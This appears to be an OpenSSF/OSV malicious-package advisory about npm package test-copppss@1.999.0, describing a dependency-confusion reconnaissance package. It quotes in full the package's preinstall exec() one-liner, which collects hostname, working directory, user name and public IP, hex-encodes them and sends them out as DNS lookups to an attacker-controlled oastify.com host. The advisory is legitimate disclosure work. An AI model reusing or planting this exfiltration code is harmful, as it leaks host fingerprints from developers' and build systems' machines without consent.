OpenSSF/OSV advisory MAL-2026-5926 confirms this npm version as malicious. On `npm install`, the package's `preinstall` hook (`node index.js > /dev/null 2>&1`) runs a shell pipeline that collects host identifiers — `hostname`, `pwd`, `whoami`, the package name `test-copppss`, and the machine's public IP via `curl https://ifconfig.me` — hex-encodes the concatenation with `xxd -p`, and exfiltrates it as DNS subdomain lookups to `*.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com` (a Burp...
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in test-copppss (npm)
Details
On `npm install`, the package's `preinstall` hook (`node index.js > /dev/null 2>&1`) runs a shell pipeline that collects host identifiers — `hostname`, `pwd`, `whoami`, the package name `test-copppss`, and the machine's public IP via `curl https://ifconfig.me` — hex-encodes the concatenation with `xxd -p`, and exfiltrates it as DNS subdomain lookups to `*.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com` (a Burp Collaborator OAST endpoint controlled by the operator). Code at index.js:2 is `exec("a=$(hostname;pwd;whoami;echo 'test-copppss';curl https://ifconfig.me;) && echo $a | xxd -p | head | while read ut;do nslookup $ut.iwisr6uvbepzgs9fy8nyytl4ovumic61.oastify.com;done")`. The package metadata (empty description, near-max version `1.999.0` to win semver resolution, single trivial dependency, preinstall beacon) matches the canonical dependency-confusion / namespace-claim reconnaissance shape — the attacker is probing which internal build systems resolve `test-copppss` to this public name and is harvesting the host fingerprint of any environment that does.
Decision reason
OSV/OpenSSF confirms test-copppss@1.999.0 as malicious package MAL-2026-5926. Malicious code in test-copppss (npm)